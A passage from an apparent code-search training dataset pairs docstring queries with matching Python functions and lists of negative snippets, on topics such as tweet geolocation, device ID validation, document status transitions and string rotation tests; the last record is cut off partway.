"def is_tweet_in_latlong_radius(tweet_json:str, latlong, radius:float):\r\n\ttweet_dict = json.loads(tweet_json)\r\n\ttweet_coords = None\r\n\t\r\n\t#Check whether coordinates are available or whether a valid place is available to approximate coordinates from\r\n\tcoordinates_available = 'coordinates' in tweet_dict and tweet_dict['coordinates'] is not None\r\n\tplace_available = ('place' in tweet_dict and tweet_dict['place'] is not None\r\n\t\t\t and 'bounding_box' in tweet_dict['place']\r\n\t\t\t and tweet_dict['place']['bounding_box'] is not None\r\n\t\t\t and 'coordinates' in tweet_dict['place']['bounding_box']\r\n\t\t\t and tweet_dict['place']['bounding_box']['coordinates'] is not None)\r\n\t\r\n\t#If coordinates are available in some form, use them as the tweet coordinates\r\n\tif coordinates_available:\r\n\t\ttweet_coords = tweet_dict['coordinates']['coordinates']\r\n\telif place_available:\r\n\t\ttweet_bounding_box = tweet_dict['place']['bounding_box']['coordinates'][0]\r\n\t\ttweet_bb_centroid_longitude = sum(coord[0] for coord in tweet_bounding_box)/len(tweet_bounding_box)\r\n\t\ttweet_bb_centroid_latitude = sum(coord[1] for coord in tweet_bounding_box)/len(tweet_bounding_box)\r\n\t\ttweet_coords = [tweet_bb_centroid_longitude, tweet_bb_centroid_latitude]\r\n\tif tweet_coords is None:\r\n\t\tsys.stderr.write(f\"Tweet coords is none. Ignoring offending tweet: {tweet_json}\")\r\n\t\treturn False\r\n\t\r\n\t#longitude is currently first due to how Twitter orders coordinates; we flip this now\r\n\ttweet_coords = list(reversed(tweet_coords))\r\n\ttweet_distance = distance(tweet_coords, latlong)\r\n\treturn tweet_distance.miles <= radius",
"def sphereRadius(self,model=0):\n cm = self.centerOfMass(model) \n radius = 0.0\n for a in self.atoms.values():\n if a.inModel(model):\n dist_vector = (a.coordinates - cm).A.ravel()\n distance = sqrt(dot(dist_vector,dist_vector))\n print distance\n if distance > radius:\n radius = distance\n return (cm, radius)",
"def _check_area(self):\n (lat_max, lon_min, lat_min, lon_max) = self.area\n if not (\n -90 <= lat_max <= 90\n and -90 <= lat_min <= 90\n and -180 <= lon_min <= 180\n and -180 <= lon_max <= 180\n and lat_max > lat_min\n and lon_max != lon_min\n ):\n raise ValueError(\n \"Provide coordinates as lat_max lon_min lat_min lon_max. \"\n \"Latitude must be in range -180,+180 and \"\n \"longitude must be in range -90,+90.\"\n )"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Check a list of devices (12-char hex strings). Require ALL devices to be valid. This is intentional, rather than filtering out bad IDs, because the user might not notice that some devices are incorrect.
|
def verifyDeviceList(devices:[str]) -> bool:
return all(map(verifyDeviceString, devices))
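# Editor's note (hedged): verifyDeviceString is defined elsewhere in the source module.
# A minimal sketch consistent with the "12-char hex string" requirement could be:
#     def verifyDeviceString(device: str) -> bool:
#         return len(device) == 12 and all(c in "0123456789abcdefABCDEF" for c in device)
# e.g. verifyDeviceList(["0123456789AB", "ZZZZZZZZZZZZ"]) -> False, since every ID must be valid.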
|
[
"def test_validate_list_true(self):\n subset_list = ['0064F', '0088E', '00890']\n self.assertTrue(\n self.utils.validate_list(self.data.device_list, subset_list))",
"def check_devices(self) -> bool:\n\t\tpass",
"def validate(self):\n\n bad = list()\n logger.debug('Loading database to validate contained devices ...')\n for doc in self.backend.all_items:\n # Try and load device based on database info\n _id = doc.get(self._id_key, \"(unknown id)\")\n try:\n logger.debug(\"Attempting to initialize %s...\", _id)\n item = self._get_item_from_document(doc)\n logger.debug(\"Attempting to validate ...\")\n self._validate_item(item)\n except Exception as e:\n logger.warning(\"Failed to validate %s because %s\", _id, e)\n bad.append(_id)\n else:\n logger.debug('Successfully validated %s', _id)\n return bad",
"def test_bluetoothctl_devices(self):\n\n output='Device EB:06:EF:62:13:19 TaoTronics TT-BH026\\n'\n output+='Device AC:1F:EA:F8:AA:A1 wacom'\n\n actual = parse(output, quiet=True)\n\n self.assertIsNotNone(actual)\n self.assertIsNotNone(actual[0])\n self.assertIsNotNone(actual[1])\n\n expected = [\n {\n \"address\": \"EB:06:EF:62:13:19\",\n \"name\": \"TaoTronics TT-BH026\"\n },\n {\n \"address\": \"AC:1F:EA:F8:AA:A1\",\n \"name\": \"wacom\"\n }\n ]\n\n if actual:\n for k, v in expected[0].items():\n self.assertEqual(v, actual[0][k], f\"Device regex failed on {k}\")\n\n for k, v in expected[1].items():\n self.assertEqual(v, actual[1][k], f\"Device regex failed on {k}\")",
"def check_hwids():\n compatibles = get_compatibles()\n hwids = []\n messages = []\n for compatible in compatibles:\n hwid = compatible.get('hwidmatch').strip('^.*-').split(' ')[0]\n if hwid not in hwids:\n hwids.append(hwid)\n\n for item in CHROMEOS_RECOVERY_ARM_HWIDS:\n if item not in hwids:\n messages.append('%s is not available, please remove it from inputstreamhelper config' % item)\n for item in hwids:\n if item not in CHROMEOS_RECOVERY_ARM_HWIDS:\n messages.append('%s is missing, please add it to inputstreamhelper config' % item)\n if messages:\n raise Exception(messages)\n\n smallest = get_smallest()\n hwid = smallest.get('hwidmatch').strip('^.*-').split(' ')[0]\n print('Chrome OS hardware id\\'s are up to date, current smallest recovery image is %s' % hwid)",
"def check_all_same_device(glist, name):\n if len(glist) == 0:\n return\n device = glist[0].device\n for i, g in enumerate(glist):\n if g.device != device:\n raise DGLError(\n \"Expect {}[{}] to be on device {}, but got {}.\".format(\n name, i, device, g.device\n )\n )",
"def parse_devices(input_devices):\n ret = []\n for d in input_devices.split(','):\n for regex, func in REGEX:\n m = regex.match(d.lower().strip())\n if m:\n tmp = func(m.groups())\n # prevent duplicate\n for x in tmp:\n if x not in ret:\n ret.append(x)\n break\n else:\n raise NotSupportedCliException(\n 'Can not recognize device: \"%s\"' % d)\n return ret",
"def check_udev_rules():\n ok = True\n udev_dir = Path(\"/etc/udev/rules.d/\")\n desired_rules = {\n 'dfu': {_udev_rule(\"03eb\", \"2ff4\"), _udev_rule(\"03eb\", \"2ffb\"), _udev_rule(\"03eb\", \"2ff0\")},\n 'input_club': {_udev_rule(\"1c11\", \"b007\")},\n 'stm32': {_udev_rule(\"1eaf\", \"0003\"), _udev_rule(\"0483\", \"df11\")},\n 'bootloadhid': {_udev_rule(\"16c0\", \"05df\")},\n 'caterina': {\n _udev_rule(\"2341\", \"0036\", 'ENV{ID_MM_DEVICE_IGNORE}=\"1\"'),\n _udev_rule(\"1b4f\", \"9205\", 'ENV{ID_MM_DEVICE_IGNORE}=\"1\"'),\n _udev_rule(\"1b4f\", \"9203\", 'ENV{ID_MM_DEVICE_IGNORE}=\"1\"'),\n _udev_rule(\"2a03\", \"0036\", 'ENV{ID_MM_DEVICE_IGNORE}=\"1\"')\n }\n }\n\n # These rules are no longer recommended, only use them to check for their presence.\n deprecated_rules = {\n 'dfu': {_deprecated_udev_rule(\"03eb\", \"2ff4\"), _deprecated_udev_rule(\"03eb\", \"2ffb\"), _deprecated_udev_rule(\"03eb\", \"2ff0\")},\n 'input_club': {_deprecated_udev_rule(\"1c11\")},\n 'stm32': {_deprecated_udev_rule(\"1eaf\", \"0003\"), _deprecated_udev_rule(\"0483\", \"df11\")},\n 'bootloadhid': {_deprecated_udev_rule(\"16c0\", \"05df\")},\n 'caterina': {'ATTRS{idVendor}==\"2a03\", ENV{ID_MM_DEVICE_IGNORE}=\"1\"', 'ATTRS{idVendor}==\"2341\", ENV{ID_MM_DEVICE_IGNORE}=\"1\"'}\n }\n\n if udev_dir.exists():\n udev_rules = [rule_file for rule_file in udev_dir.glob('*.rules')]\n current_rules = set()\n\n # Collect all rules from the config files\n for rule_file in udev_rules:\n for line in rule_file.read_text().split('\\n'):\n line = line.strip()\n if not line.startswith(\"#\") and len(line):\n current_rules.add(line)\n\n # Check if the desired rules are among the currently present rules\n for bootloader, rules in desired_rules.items():\n # For caterina, check if ModemManager is running\n if bootloader == \"caterina\":\n if check_modem_manager():\n ok = False\n cli.log.warn(\"{bg_yellow}Detected ModemManager without the necessary udev rules. Please either disable it or set the appropriate udev rules if you are using a Pro Micro.\")\n if not rules.issubset(current_rules):\n deprecated_rule = deprecated_rules.get(bootloader)\n if deprecated_rule and deprecated_rule.issubset(current_rules):\n cli.log.warn(\"{bg_yellow}Found old, deprecated udev rules for '%s' boards. The new rules on https://docs.qmk.fm/#/faq_build?id=linux-udev-rules offer better security with the same functionality.\", bootloader)\n else:\n cli.log.warn(\"{bg_yellow}Missing udev rules for '%s' boards. You'll need to use `sudo` in order to flash them.\", bootloader)\n\n return ok",
"def valid_device_indexes():\n return tuple(AudioInputSource.input_devices().keys())",
"def load_dev_ids():\n for dev_id in os.environ['DEV_IDS'].split(','):\n try:\n dev_ids.append(int(dev_id))\n except ValueError:\n print(f\"Skipped invalid ID: '{dev_id}'\")",
"def get_device_ids(self) -> Set[str]:\n stdout = self.run_cli_command(\"-d\")[0]\n \n return set([id.strip() for id in stdout.split(\"\\n\") if id.strip() != ''])",
"def _is_valid_device(device):\n return not os.system(\"hciconfig list 2>/dev/null | grep -q ^%s:\" % device)",
"def test_device_id_list_handler_too_many_simultaneous_registrations(self):\n headers = dict(self.auth)\n headers['Content-Type'] = self.controller.DEVICE_ID_LIST_MEDIA_TYPE\n with self.request_context_with_library(\n \"/\", method='POST', headers=headers, data=\"device1\\ndevice2\"\n ):\n self.controller.authenticated_patron_from_request()\n response = self.controller.device_id_list_handler()\n eq_(413, response.status_code)\n eq_(\"You may only register one device ID at a time.\", response.detail)",
"def devices(self):\n command = [self.gracebat, '-v']\n output = check_output(command, stderr=subprocess.STDOUT)\n found_devices = False\n for line in output.split(\"\\n\"):\n if found_devices:\n return line.split()\n if line.startswith(\"Registered devices:\"):\n # the next line will be the device list\n found_devices = True",
"def scan_devices(): # {\n logger.info(\"IN scan_devices\")\n\n devices_dict = thePlayer.scan_devices()\n devices_list = [\"%s,%s\" % (k, cc.name) for k, cc in devices_dict.items()]\n try:\n devices = \"\\n\".join(devices_list)\n except TypeError:\n devices = \"\\n\".join([\"??\"]*7)\n bdevices = devices.encode()\n self.send_header(\"Content-Length\", str(len(bdevices)))\n self.end_headers()\n self.wfile.write(bdevices)\n self.wfile.flush()",
"def check_list_ids(ids):\n logger = logging.getLogger('TaxaDB')\n if len(ids) > TaxaDB.MAX_LIST:\n logger.error(\n \"Too many accession entries to request (%d), max %d\"\n % (len(ids), TaxaDB.MAX_LIST))\n sys.exit(1)\n return True",
"def _valid_cdr3(cdr3):\n amino_acids = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']\n valid = np.all([aa in amino_acids for aa in cdr3])\n return valid",
"def check_bad_chars(seq, amino_acids):\n bad_characters = []\n for character in seq:\n if character not in amino_acids.keys():\n bad_characters = bad_characters + [character]\n\n return bad_characters",
"def device_ids(self, value):\n\t\tvendor_id, product_id = tuple(value.split(\":\")[-2:])\n\t\tcosmetic_id = \"device-%s-%s\" % (vendor_id, product_id)\n\t\treturn (vendor_id, product_id, cosmetic_id)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Parse both radius and center arguments. If neither is specified, return None. If only one is specified, raise an error. If both are specified, return the pair as a tuple.
|
def argParseRadiusArgs(r:float, c:str):
try:
x = (argParseRadius(r), argParseCenter(c))
if all(x):
return x
elif not any(x):
return None
else:
raise ArgumentError("Arguments 'radius' and 'center' must both be specified. Argument 'radius' must be a float between 0 and 6371 (kilometers) and argument 'center' must be a valid pair of latitude,longitude coordinates, such as 'center=88.1,-110.2242", status_code=400)
except ArgumentError:
raise
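# Illustrative behaviour (editor's sketch; argParseRadius and argParseCenter are assumed to
# return a parsed value -- a float and a (lat, lon) tuple respectively -- or None when their
# argument is absent):
#     argParseRadiusArgs(None, None)           -> None                    (neither given)
#     argParseRadiusArgs(50.0, "88.1,-110.2")  -> (50.0, (88.1, -110.2))  (both given)
#     argParseRadiusArgs(50.0, None)           -> raises ArgumentError    (only one given)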
|
[
"def find_center_oval(x1, y1, x2, y2) -> tuple:\r\n return int((x1 + x2)/2), int((y1+y2)/2)",
"def circle_from_points(p1, p2, p3):\n\n # center is intersection of bisectors of segments p1-p2 and p2-p3\n\n s = np.real((p3-p1)*np.conj(p3-p2)) / np.imag((p3-p1)*np.conj(p3-p2))\n center = (p1+p2)/2 + np.complex(0, s)*(p1-p2)/2\n radius = abs(p1-center)\n\n return center, radius",
"def extract_circle(center, radius, coords):\n return np.where(((coords - center) ** 2).sum(axis=-1) < radius**2)[0]",
"def define_circle_points(center, radius):\n res = np.pi/radius # set resolution to avoid double counting a pixel\n x = center[0] + np.round(radius * np.cos(np.arange(-np.pi, np.pi, res)))\n y = center[1] + np.round(radius * np.sin(np.arange(-np.pi, np.pi, res)))\n return x, y",
"def get_pair(value=None, val_1_default=None, val2_default=None, name=\"value\"):\n if value is None:\n return val_1_default, val2_default\n if isinstance(value, type(0.0)) or isinstance(value, type(0)):\n return value, value\n elif isinstance(value, type(())) or isinstance(value, type([])):\n if len(value) == 2:\n return value\n else:\n raise ValueError(name + \" requires a tuple of length 2\")",
"def nearest_neighbours(nodes, center, radius):\n nodes = np.asarray(nodes)\n d = cartesian_distance(nodes, center)\n nearest_nodes = nodes[d < radius]\n return tuple(map(tuple, nearest_nodes))",
"def parse_credentials(username: str, password: str) -> tuple:\n return username, password",
"def circle_insec(self, p1, r1, p2, r2):\r\n x = p1[0]\r\n y = p1[1]\r\n R = r1\r\n a = p2[0]\r\n b = p2[1]\r\n S = r2\r\n d = math.sqrt((abs(a - x)) ** 2 + (abs(b - y)) ** 2)\r\n if d > (R + S) or d < (abs(R - S)):\r\n print(\"Two circles have no intersection\")\r\n return\r\n elif d == 0 and R == S:\r\n print(\"Two circles have same center!\")\r\n return\r\n else:\r\n A = (R ** 2 - S ** 2 + d ** 2) / (2 * d)\r\n h = math.sqrt(R ** 2 - A ** 2)\r\n x2 = x + A * (a - x) / d\r\n y2 = y + A * (b - y) / d\r\n x3 = round(x2 - h * (b - y) / d, 2)\r\n y3 = round(y2 + h * (a - x) / d, 2)\r\n x4 = round(x2 + h * (b - y) / d, 2)\r\n y4 = round(y2 - h * (a - x) / d, 2)\r\n print(x3, y3)\r\n print(x4, y4)\r\n c1 = np.array([x3, y3])\r\n c2 = np.array([x4, y4])\r\n return c1, c2",
"def __init__(self, radius=2, center=(0, 0)):\n self.radius = radius\n self.circle_center = center\n self.circle_area = self.calculate_area()\n self.circle_perimeter = self.calculate_perimeter()",
"def circle(center=[0,0], r=1.):\n ang = np.linspace(0,2*np.pi,1000)\n #unit circle * radius\n x = np.cos(ang)*r\n y = np.sin(ang)*r\n #circle transloation\n x = x + center[0]\n y = y + center[0]\n return x,y",
"def greatcircle(\n lat1: float,\n lon1: float,\n lat2: float,\n lon2: float,\n *args: Any,\n **kwargs: Any,\n) -> list[tuple[float, float]]:\n geod = Geod(ellps=\"WGS84\")\n return [\n (lat, lon)\n for (lon, lat) in geod.npts(lon1, lat1, lon2, lat2, *args, **kwargs)\n ]",
"def __circle__(center=[0,0], r=1.):\n ang = np.linspace(0,2*np.pi,1000)\n #unit circle * radius\n x = np.cos(ang)*r\n y = np.sin(ang)*r\n #circle transloation\n x = x + center[0]\n y = y + center[0]\n return x,y",
"def parse_arguments(arguments):\n usage = \"%prog [options] SYSTEM HOST NAME MENS_DISTANCE WOMENS_DISTANCE\"\n option_parser = OptionParser(usage)\n option_parser.add_option(\"-u\", \"--username\", default=USERNAME)\n options, arguments = option_parser.parse_args(arguments[1:])\n index = count(0)\n try:\n system = arguments[index.next()]\n host = arguments[index.next()]\n name = arguments[index.next()]\n mens_distance = int(arguments[index.next()])\n womens_distance = int(arguments[index.next()])\n except IndexError:\n option_parser.error(\"Please provide the correct number of positional \"\n \"arguments.\")\n except ValueError, error:\n option_parser.error(error)\n return options, (system, host, name, (mens_distance, womens_distance))",
"def _check_spatial_data(\n uns: Mapping, library_id: Union[str, None, Empty]\n) -> Tuple[Optional[str], Optional[Mapping]]:\n spatial_mapping = uns.get(\"spatial\", {})\n if library_id is _empty:\n if len(spatial_mapping) > 1:\n raise ValueError(\n \"Found multiple possible libraries in `.uns['spatial']. Please specify.\"\n f\" Options are:\\n\\t{list(spatial_mapping.keys())}\"\n )\n elif len(spatial_mapping) == 1:\n library_id = list(spatial_mapping.keys())[0]\n else:\n library_id = None\n if library_id is not None:\n spatial_data = spatial_mapping[library_id]\n else:\n spatial_data = None\n return library_id, spatial_data",
"def parse_point(coords_str):\n x, y = coords_str.split()\n return float(x), float(y)",
"def raletivePosition(pointA, pointB):\n if (type(pointA) == tuple) and (type(pointB) == tuple):\n x = pointA[0] + pointB[0]\n y = pointA[1] + pointB[1]\n return (x, y)\n else:\n print(\"PointA and PointB must be 'tuple'.\")\n raise TypeError",
"def pair_parse(arg, location_dict):\n equal_index = find_equal(arg)\n if equal_index == -1:\n logging.error(\"cannot find [=] in argument [%s] of -xattr\", arg)\n return -1\n\n if equal_index == 0:\n logging.error(\"no name pattern before [=] in argument [%s] of -xattr\", arg)\n return -1\n\n if equal_index == len(arg) - 1:\n logging.error(\"no value pattern after [=] in argument [%s] of -xattr\", arg)\n return -1\n\n name = arg[0:equal_index]\n # Remove the escape \\\\ or \\=\n name = name.replace(\"\\\\\\\\\", \"\\\\\").replace(\"\\\\=\", \"=\")\n if name not in CLOWNFISH_LOCATION_KEYS:\n logging.error(\"invalid key [%s], expected one of %s\",\n name, CLOWNFISH_LOCATION_KEYS)\n return -1\n\n value = arg[equal_index + 1:]\n # Remove the escape \\\\ or \\=\n value = value.replace(\"\\\\\\\\\", \"\\\\\").replace(\"\\\\=\", \"=\")\n location_dict[name] = value\n return 0",
"def _parse_coordinates(self, vars: Dict[str, VariableDefinition]) -> Tuple[Dict[str, VariableDefinition], Dict[str, VariableDefinition]]:\n coords = {name: var for name, var in vars.items() if var.is_coordinate()}\n vars = {name: var for name, var in vars.items() if not var.is_coordinate()}\n return coords, vars",
"def parse_pos_args(args, kwargs, name1, name2, integer=False, others=[]):\n from .position import PositionD, PositionI, _PositionD, _PositionI\n def canindex(arg):\n try: arg[0], arg[1]\n except (TypeError, IndexError): return False\n else: return True\n\n other_vals = []\n if len(args) == 0:\n # Then name1,name2 need to be kwargs\n try:\n x = kwargs.pop(name1)\n y = kwargs.pop(name2)\n except KeyError:\n raise TypeError(\n 'Expecting kwargs %s, %s. Got %s'%(name1, name2, kwargs.keys())) from None\n elif ( ( isinstance(args[0], PositionI) or\n (not integer and isinstance(args[0], PositionD)) ) and\n len(args) <= 1+len(others) ):\n x = args[0].x\n y = args[0].y\n for arg in args[1:]:\n other_vals.append(arg)\n others.pop(0)\n elif canindex(args[0]) and len(args) <= 1+len(others):\n x = args[0][0]\n y = args[0][1]\n for arg in args[1:]:\n other_vals.append(arg)\n others.pop(0)\n elif len(args) == 1:\n if integer:\n raise TypeError(\"Cannot parse argument %s as a PositionI\"%(args[0]))\n else:\n raise TypeError(\"Cannot parse argument %s as a PositionD\"%(args[0]))\n elif len(args) <= 2 + len(others):\n x = args[0]\n y = args[1]\n for arg in args[2:]:\n other_vals.append(arg)\n others.pop(0)\n else:\n raise TypeError(\"Too many arguments supplied\")\n # Read any remaining other kwargs\n if others:\n for name in others:\n val = kwargs.pop(name)\n other_vals.append(val)\n if kwargs:\n raise TypeError(\"Received unexpected keyword arguments: %s\",kwargs)\n\n if integer:\n pos = _PositionI(int(x),int(y))\n else:\n pos = _PositionD(float(x),float(y))\n if other_vals:\n return (pos,) + tuple(other_vals)\n else:\n return pos"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Ensures valid `docstatus` transition.
|
def allow_transition_from_0_to_2(self, docstatus):
    if self.docstatus > 2:
        frappe.throw(_('This document is currently queued for execution. Please try again'),
            title=_('Document Queued'), indicator='red')
    if not self.docstatus:
        self.docstatus = 0
    if docstatus == 0:
        if self.docstatus == 0:
            self._action = "save"
        elif self.docstatus == 1:
            self._action = "submit"
            self.check_permission("submit")
        # else:
        #     raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 0 to 2"))
    elif docstatus == 1:
        if self.docstatus == 1:
            self._action = "update_after_submit"
            self.check_permission("submit")
        elif self.docstatus == 2:
            self._action = "cancel"
            self.check_permission("cancel")
        else:
            raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 1 to 0"))
    elif docstatus == 2:
        raise frappe.ValidationError(_("Cannot edit cancelled document"))
|
[
"def assert_valid_status_transition(cls, old_status: str, new_status: str):\n for status in (old_status, new_status):\n cls.assert_valid_status(status)\n\n # Status can never transition to NEW.\n # All other transitions are valid, at least for now.\n if not (old_status == cls.NEW or new_status != cls.NEW):\n raise ValueError(\"Invalid bookmark status transition '{0}' -> '{1}'\".format(old_status, new_status))",
"def assert_valid_original_status(cls, status: str):\n if status not in cls.VALID_ORIGINAL_STATUSES:\n raise ValueError(\"Invalid bookmark status for new bookmark '{0}'; must be {1}\".format(\n status, ' or '.join([\"'{}'\".format(s) for s in cls.VALID_ORIGINAL_STATUSES])))",
"def _status_setter_checks(self):\n if self.check_status((\"public\", )):\n raise QiitaDBStatusError(\"Illegal operation on public collection!\")",
"def assert_valid_status(cls, status: str):\n if status not in cls.VALID_STATUSES:\n raise ValueError(\"Invalid bookmark status '{0}'; must be one of {1}\".format(\n status, ', '.join([\"'{}'\".format(s) for s in cls.VALID_STATUSES])))",
"def _status_setter_checks(self):\n if self.check_status({\"public\"}):\n raise QiitaDBStatusError(\"Can't set status away from public!\")",
"def is_valid(document_id):\n pass",
"def test_gov_sees_no_drafts(self):\n # View the organization that fs_user_1 belongs to\n response = self.clients['gov_analyst'].get(\n \"/api/documents\"\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n response_data = json.loads(response.content.decode(\"utf-8\"))\n\n for doc in response_data:\n self.assertNotEqual(doc['status']['status'],\n 'Draft')",
"def _check_draft_status(func):\n def wrapper(self, *args, **kwargs):\n if self.status != Status.DRAFT:\n msg = '{} is not in Draft status. Please clone first to modify'.format(self)\n logger.error(msg)\n raise RuntimeError(msg)\n return func(self, *args, **kwargs)\n return wrapper",
"def validate_possible_transitions(cls, rs_model: RoutingSlipModel,\n future_status: RoutingSlipStatus):\n allowed_statuses = RoutingSlipStatusTransitionService.get_possible_transitions(rs_model)\n if future_status not in allowed_statuses:\n raise BusinessException(Error.FAS_INVALID_RS_STATUS_CHANGE)",
"def is_valid(cls, status):\n\n return status == cls.WORKING or status == cls.PUBLISHED or status == cls.ALL",
"def ensure_valid(self):\n self.op_info.ensure_valid()",
"def _validate_status(self, vpn_service, ipsec_site_conn, final_status):\n\n assert(final_status == vpn_service['vpnservice']['status']), (\n \"VPN SERVICE IS NOT IN %s STATE\" % final_status)\n assert(final_status == ipsec_site_conn['ipsec_site_connection']\n ['status']), (\"THE IPSEC SITE CONNECTION IS NOT IN %s STATE\"\n % final_status)",
"def test_invalid_change_doc_id():\n statement = copy.deepcopy(CHANGE_STATEMENT)\n del statement['baseDebtor']\n statement['documentId'] = '00123456789'\n\n is_valid, errors = validate(statement, 'changeStatement', 'ppr')\n\n if errors:\n for err in errors:\n print(err.message)\n print(errors)\n\n assert not is_valid",
"def test_cannot_complete_proposition_without_ongoing_status(self, proposition_status):\n user = create_test_user(\n permission_codenames=(\n PropositionPermission.change_all,\n ),\n dit_team=TeamFactory(),\n )\n proposition = PropositionFactory(\n status=proposition_status,\n )\n entity_document = PropositionDocument.objects.create(\n proposition_id=proposition.pk,\n original_filename='test.txt',\n created_by=user,\n )\n entity_document.document.mark_as_scanned(True, '')\n url = reverse(\n 'api-v3:investment:proposition:complete',\n kwargs={\n 'proposition_pk': proposition.pk,\n 'project_pk': proposition.investment_project.pk,\n },\n )\n api_client = self.create_api_client(user=user)\n response = api_client.post(url)\n response_data = response.json()\n assert response.status_code == status.HTTP_409_CONFLICT\n detail = f'The action cannot be performed in the current status {proposition_status}.'\n assert response_data['detail'] == detail\n\n proposition.refresh_from_db()\n assert proposition.status == proposition_status\n assert proposition.details == ''",
"def test_counting_unready_docs(self):\n # Make a doc with an approved but not-ready-for-l10n rev:\n d = DocumentFactory(is_localizable=True)\n r = ApprovedRevisionFactory(document=d, is_ready_for_localization=False)\n\n # It shouldn't show up in the total:\n self.assertEqual(0, l10n_overview_rows(\"de\")[\"all\"][\"denominator\"])\n\n r.is_ready_for_localization = True\n r.save()\n self.assertEqual(1, l10n_overview_rows(\"de\")[\"all\"][\"denominator\"])",
"def notCurable(self):\n self.pkmn.setStatus(self.status)\n self.delegate2.checkCurable(self.pkmn)\n \n assert self.pkmn.getStatus() == self.status, \"Status should not be cured\"",
"def test_change_status_missing_parameter(self):\n self.login()\n\n created_todo = create_todo()\n todo_id = created_todo.id\n pristine_status = created_todo.mark_completed\n\n response = self.client.post(url_for('alaya_todo.todo_change_status'))\n\n self.assert200(response)\n\n response_dict = json.loads(response.data)\n\n # Checking the expected values in the response\n self.assertFalse(response_dict['success'], 'The success key must be False')\n self.assertEqual(response_dict['status'], 400, 'The status key must be 400.')\n self.assertEqual(response_dict['message'], 'The identifier of the task is required to update the status.',\n 'The response messages must math.')\n\n # Checking the database changes\n updated_todo = load_todo(todo_id)\n self.assertEqual(pristine_status, updated_todo.mark_completed, 'The mark_completed properties must match.')\n\n delete_todo(todo_id)\n\n self.logout()",
"def test_catch_correctable_error_set_status(self):\n record = MobileNumber(None, '27345678901')\n assert record.status != 'corrected'\n record.catch_correctable_error()\n self.assertEqual(record.status, 'corrected')",
"def validate_agreement_document(self, operation):\n if self.request.validated['tender_status'] not in ['active.qualification', 'active.awarded']:\n raise_operation_error(\n self.request, 'Can\\'t {} document in current ({}) tender status'.format(\n operation, self.request.validated['tender_status']))\n if any([i.status != 'active'\n for i in self.request.validated['tender'].lots\n if i.id in [a.lotID\n for a in self.request.validated['tender'].awards\n if a.id in self.request.validated['agreement'].get_awards_id()]]):\n raise_operation_error(self.request, 'Can {} document only in active lot status'.format(operation))\n if self.request.validated['agreement'].status not in ['pending', 'active']:\n raise_operation_error(self.request, 'Can\\'t {} document in current agreement status'.format(operation))\n if any([any([c.status == 'accepted' for c in i.complaints])\n for i in self.request.validated['tender'].awards\n if i.lotID in [a.lotID\n for a in self.request.validated['tender'].awards\n if a.id in self.request.validated['agreement'].get_awards_id()]]):\n raise_operation_error(self.request, 'Can\\'t {} document with accepted complaint')\n return True",
"def test_put_invalid_local_doc(self):\n self.put_document_variants('_local', Expect.VALIDATION_EXCEPTION_DOCID.value)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test string rotation returns false.
|
def test_string_rotration_false():
    from string_rotation import string_rotation
    assert string_rotation('hello', 'nothello') is False
|
[
"def test_string_rotation_true():\n from string_rotation import string_rotation\n assert string_rotation('hello', 'elloh') is True",
"def string_rotation(str1, str2):\n if len(str1) == len(str2):\n return is_substring(str1+str1, str2)\n return False",
"def IsRotation(a,b):\n\trotation = 0\n\trotate_max = len(a)\n\n\twhile rotation < rotate_max:\n\t\trotation += 1\n\n\t\tif a == b:\n\t\t\treturn True\n\n\t\ta = a[-1] + a[:-1]\n\n\treturn False",
"def rotateString(self, A: str, B: str) -> bool:\n return len(A) == len(B) and B in A + A",
"def valid_rotation(self, rot):\n # Is this a valid rotation?\n if not rot in Rotation:\n if self.verbose: print(f\"Invalid rot {rot}, must be a Rotation.\") \n return False \n\n return True",
"def rotateString(self, A: str, B: str) -> bool:\n # Concatenate A with itself and then search for B\n return len(A) == len(B) and B in (A + A)",
"def check_rotation(raster_one, raster_two):\n test = (raster_one.rotone == raster_two.rotone) and \\\n (raster_one.rottwo == raster_two.rottwo)\n return test",
"def is_rotated(array_1, array_2):\n if len(array_1) != len(array_2):\n return False\n if array_1 == array_2:\n return True\n if set(array_1) != set(array_2):\n return False\n index = array_1.index(array_2[0])\n return (array_2 == (array_1[index:] + array_1[:index]))",
"def is_orientation_legal(self, newrot, newmir):\n if self.has_vdd and newrot != 0:\n return False\n if self.has_gnd and newrot != 2:\n return False\n return True",
"def test_rotate_90_right(self):\n self.rover.rotate_90_right()\n self.assertEqual(self.rover.cardinalPoint, 'S'), \"should be S\"",
"def is_tandem(seq: str) -> bool:\n L = len(seq)\n for i in range(1, -(-L // 2) + 1):\n if L % i == 0 and seq == seq[:i] * (L // i):\n return True\n return False",
"def fromString(self, str: 'SbString') -> \"SbBool\":\n return _coin.SbRotation_fromString(self, str)",
"def reference_is_rotated(self):\n if (\n np.allclose(self.axis_u, (1, 0, 0))\n and np.allclose(self.axis_v, (0, 1, 0))\n and np.allclose(self.axis_w, (0, 0, 1))\n ):\n return False\n return True",
"def is_mirror(s):\n new = s[:(len(s)//2)]\n if (mirror(new)==s):\n return True\n return False",
"def test_RotatE():\n testing_function('rotate')",
"def test_encrypt_lowercase():\n output = rot13.encrypt(\"abc\")\n assert output == \"nop\"",
"def motor_rotating(self):\n self.write_line('MOTOR:ROTATE?')\n rotation_text = self.read_line()\n rotation = bool(int(rotation_text))\n return rotation",
"def is_permutation_v3(string1, string2):\n\n\tstring1_dict = str_count_dict(string1)\n\n\tfor c in string2:\n\t\tif c in string1_dict:\n\t\t\tstring1_dict[c] -= 1\n\t\telse:\n\t\t\treturn False\n\n\tfor char, count in string1_dict.iteritems():\n\t\tif count != 0:\n\t\t\treturn False\n\n\treturn True",
"def test_encrypt_uppercase():\n output = rot13.encrypt(\"ABC\")\n assert output == \"NOP\""
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test string rotation returns true.
|
def test_string_rotation_true():
    from string_rotation import string_rotation
